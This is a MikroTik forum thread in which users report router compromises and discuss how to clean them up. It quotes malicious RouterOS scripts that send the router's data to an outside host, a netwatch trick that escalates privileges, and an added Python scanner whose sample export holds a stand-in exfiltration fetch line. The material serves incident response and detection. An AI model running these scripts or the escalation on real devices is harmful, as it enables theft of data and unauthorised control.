JacquesL
just joined
Topic Author
Posts: 8
Joined: Sat Mar 04, 2017 11:24 am

Possible security breach

Sat Mar 04, 2017 11:33 am

I found 2 suspicious scripts on my MikroTik router after installing 6.39rc41.
The scripts were owned by admin (disabled, of course).

The first one captures a list of the files:

ptty-r
:delay 100s
/file print file=rmip.txt
/file set rmip.txt contents="yes"
/system script run ptty
The second sends the data to a page:

ptty
:delay 100s
:global myip [/file get mip.txt contents]
:global rmyip [/file get rmip.txt contents]
:global ctryip [/file get ctryip.txt contents]
/tool fetch url="http://createpage.myserv.ignorelist.com/.../metaR-srv.php\?ip=$myip&reboot=$rmyip&ctry=$ctryip" mode=http keep-result=no
Any recommendations? Have you seen this before?
Is there any other investigation I can do to figure out if anything has been changed?
Thanks
 
mrz
MikroTik Support
Posts: 7053
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia

Re: Possible security breach

Mon Mar 06, 2017 1:19 pm

If your concern is that RouterOS upgrade added those scripts, then no, it is not possible.

Somebody logged in and added those scripts. Disable admin user and change passwords for other users on that router.
 
jabberd
newbie
Posts: 25
Joined: Tue Feb 28, 2017 1:10 pm

Re: Possible security breach

Wed Mar 22, 2017 1:10 am

Any recommendations? Have you seen this before?
Is there any other investigation I can do to figure out if anything has been changed?
I've seen this before on some devices: there was also a user "router" with full privileges (with an unknown password), and "admin" in a newly created "admin" group with reduced privileges.
 
Van9018
Long time Member
Posts: 558
Joined: Mon Jun 16, 2014 6:26 pm
Location: Canada - Abbotsford

Re: Possible security breach

Wed Mar 22, 2017 3:57 am

Also check the firewall; you should have a default deny rule for inbound connections on the WAN. Consider not allowing router admin access from the WAN. Don't leave the default admin password empty: malware inside the network can log into the router and configure whatever it wants.
 
jabberd
newbie
Posts: 25
Joined: Tue Feb 28, 2017 1:10 pm

Re: Possible security breach

Wed Mar 22, 2017 1:39 pm

If you have the "router" user with full privileges, and your "admin" is set to an "admin" group with a reduced set of privileges (ssh, telnet, policy are disabled), you may try to log in as admin and add a netwatch up rule for 127.0.0.1 with something like this:
/user set admin group=full
So there'll be no need to do a configuration reset.
 
dudleyrees
just joined
Posts: 5
Joined: Mon Jun 05, 2017 12:10 pm

Re: Possible security breach

Fri Feb 16, 2018 1:34 am

Thank you Jabberd for your Netwatch line; it allowed me, as admin, to get my router to work with New Terminal and SSH login, both of which I was logged out of. I only had my router with no password on the WAN for minutes and yet got broken into; I'm amazed how quickly that happened.
 
raffav
Member
Posts: 345
Joined: Wed Oct 24, 2012 4:40 am

Re: Possible security breach

Tue Feb 20, 2018 5:51 am

Hi
But looking at it another way,
this netwatch trick is some kind of exploit.
If some tech has limited privileges in the group he belongs to, he can promote the group to full access.


Sent from my XT1580 using Tapatalk

 
normis
MikroTik Support
Posts: 26378
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Possible security breach

Tue Feb 20, 2018 9:13 am

Yes, we are already in the process of fixing it. On the other hand, that person still needs an existing user with "write" privileges.
 
jabberd
newbie
Posts: 25
Joined: Tue Feb 28, 2017 1:10 pm

Re: Possible security breach

Sat Feb 24, 2018 9:22 am

OK, I should've reported this "feature" to the support. I thought that mentioning it here was enough for things to get fixed :-)
 
punkaker
just joined
Posts: 13
Joined: Thu Apr 12, 2018 7:26 pm

Re: Possible security breach

Mon Oct 22, 2018 11:47 am

Hi! We found exactly the same today in a router with 6.43.2 (but it was with no firewall rules for an hour :( )

Do you know if the "netwatch trick" can still be done to recover privileges in the admin account? We can log in with admin but there is a "router" user with full privileges and we do not know the password.

The router is in a remote location, so it would be a big inconvenience to go there to fix this.

Thanks!
 
JJT211
Frequent Visitor
Posts: 56
Joined: Sun Apr 28, 2019 9:01 pm

Re: Possible security breach

Sun Jul 28, 2019 8:52 pm

Old thread, I know, but I think it's worth bumping.

I had the same thing happen to me. There were 2 ptty scripts in my scheduler. I had my router exposed to the WAN with the default username for only a matter of minutes but didn't notice the scripts until a few days later. I deleted the scripts, the admin user, the new router user they created, and changed my password.

Be careful out there. Thanks for posting.
 
mkx
Forum Guru
Posts: 11597
Joined: Thu Mar 03, 2016 10:23 pm

Re: Possible security breach

Mon Jul 29, 2019 5:35 pm

Old thread, I know, but I think it's worth bumping.

I had the same thing happen to me. There were 2 ptty scripts in my scheduler. I had my router exposed to the WAN with the default username for only a matter of minutes but didn't notice the scripts until a few days later. I deleted the scripts, the admin user, the new router user they created, and changed my password.

Be careful out there. Thanks for posting.

As has been discussed in other threads, the safest thing to do when one notices that a router has been compromised is to export the configuration (the ASCII part, using the /export command), review the config for signs of anything weird, then netinstall the router (this is the only method that really removes everything), start from factory defaults (SOHO routers have quite sensible default firewall filter settings) and adjust only what's clearly needed.
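Putting the original poster's two scripts, Van9018's firewall advice and mkx's "export and review" step together: the following Python script is an added example, not code from this thread or from MikroTik. It reads the text of an /export dump and flags the kinds of things discussed above: a script whose source fetches an external URL, an unexpected user in the full group, the admin account moved to a reduced group, every scheduler entry (for manual review), and an input chain that never drops. The export snippet is constructed to resemble the thread's case (the host exfil.example.invalid, the users and the script names are placeholders, not real indicators); the `/section` followed by `add`/`set` lines layout is a simplification of a real export, and the assumption that only "admin" should hold full rights is a parameter you would adjust.

```python
"""Scan the text of a RouterOS `/export` for the signs discussed in this thread.

Added example; it is not code from the thread or from MikroTik. The export
layout (a `/section` line followed by `add`/`set` lines) is a simplification,
and every name, host and user below is constructed for the demo.
"""
import re
from urllib.parse import urlparse

# Constructed export snippet modelled on the original poster's findings:
# an extra full-rights user, admin moved to a reduced group, a script that
# fetches an external URL, and an input chain with no drop rule.
SAMPLE_EXPORT = r'''# mar/04/2017 11:30:00 by RouterOS 6.39rc41 (constructed sample)
/user group
add name=admin policy=local,read,write,test,winbox
/user
add name=router group=full
set admin group=admin
/system script
add name=ptty-r owner=admin source=":delay 100s\r\n/file print file=rmip.txt\r\n/file set rmip.txt contents=\"yes\"\r\n/system script run ptty"
add name=ptty owner=admin source=":delay 100s\r\n:global myip [/file get mip.txt contents]\r\n/tool fetch url=\"http://exfil.example.invalid/metaR-srv.php?ip=\$myip\" mode=http keep-result=no"
add name=backup owner=admin source="/system backup save name=daily"
/system scheduler
add name=ptty interval=1d on-event=ptty
/ip firewall filter
add chain=input action=accept connection-state=established,related
'''

# One argument: optional `key=` then either a double-quoted value (with \" escapes) or a bare word.
TOKEN = re.compile(r'(?:(\S+?)=)?("(?:[^"\\]|\\.)*"|\S+)')
URL_RE = re.compile(r'https?://[^\s"\\]+')


def split_args(s):
    """Return (positional args, keyword args) for one export command line."""
    args, kw = [], {}
    for m in TOKEN.finditer(s):
        key, val = m.group(1), m.group(2)
        if len(val) >= 2 and val.startswith('"') and val.endswith('"'):
            val = val[1:-1].replace('\\"', '"')   # drop quotes, unescape \"
        if key is None:
            args.append(val)
        else:
            kw[key] = val
    return args, kw


def parse_export(text):
    """Yield (section, verb, args, kwargs) for each command in an export dump."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # e.g. "/system script" opens a section
            section = line
            continue
        verb, _, rest = line.partition(" ")
        args, kw = split_args(rest)
        yield section, verb, args, kw


def scan_export(text, expected_full=frozenset({"admin"})):
    """Return (finding, detail) pairs a reviewer should check before trusting the config."""
    findings = []
    input_drop_seen = False
    for section, verb, args, kw in parse_export(text):
        # `add` carries name=..., `set` names its target positionally
        name = kw.get("name") or (args[0] if args else "?")
        if section == "/user":
            group = kw.get("group")
            if group == "full" and name not in expected_full:
                findings.append(("unexpected-full-user", name))
            if name in expected_full and group not in (None, "full"):
                findings.append(("admin-demoted", f"{name} group={group}"))
        elif section == "/system script":
            # any URL inside a script body is data leaving (or code entering) the router
            for url in URL_RE.findall(kw.get("source", "")):
                findings.append(("script-fetches-url", f"{name} -> {urlparse(url).hostname}"))
        elif section == "/system scheduler":
            findings.append(("scheduler-entry", f"{name} on-event={kw.get('on-event')}"))
        elif section == "/ip firewall filter":
            if kw.get("chain") == "input" and kw.get("action") == "drop":
                input_drop_seen = True
    if not input_drop_seen:
        findings.append(("no-input-drop-rule", "input chain never drops; router services reachable from WAN"))
    return findings


if __name__ == "__main__":
    for finding, detail in scan_export(SAMPLE_EXPORT):
        print(f"{finding:22} {detail}")
```

Run it against `/export` output saved from the router (pipe the file into `scan_export`); anything it lists is a starting point for the manual review mkx describes, not a verdict, and a clean result does not replace the netinstall.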
 
JJT211
Frequent Visitor
Posts: 56
Joined: Sun Apr 28, 2019 9:01 pm

Re: Possible security breach

Tue Jul 30, 2019 6:16 am

OK, thanks for the heads up. I noticed after I posted this a few more scripts and a few other things inside my router that I had to delete. Since this MikroTik is being used as a DMZ between the internet and my firewall, I figured I may be OK and won't worry about the reconfiguration. But I think you're right, I should do a thorough wipe regardless. Thanks again.
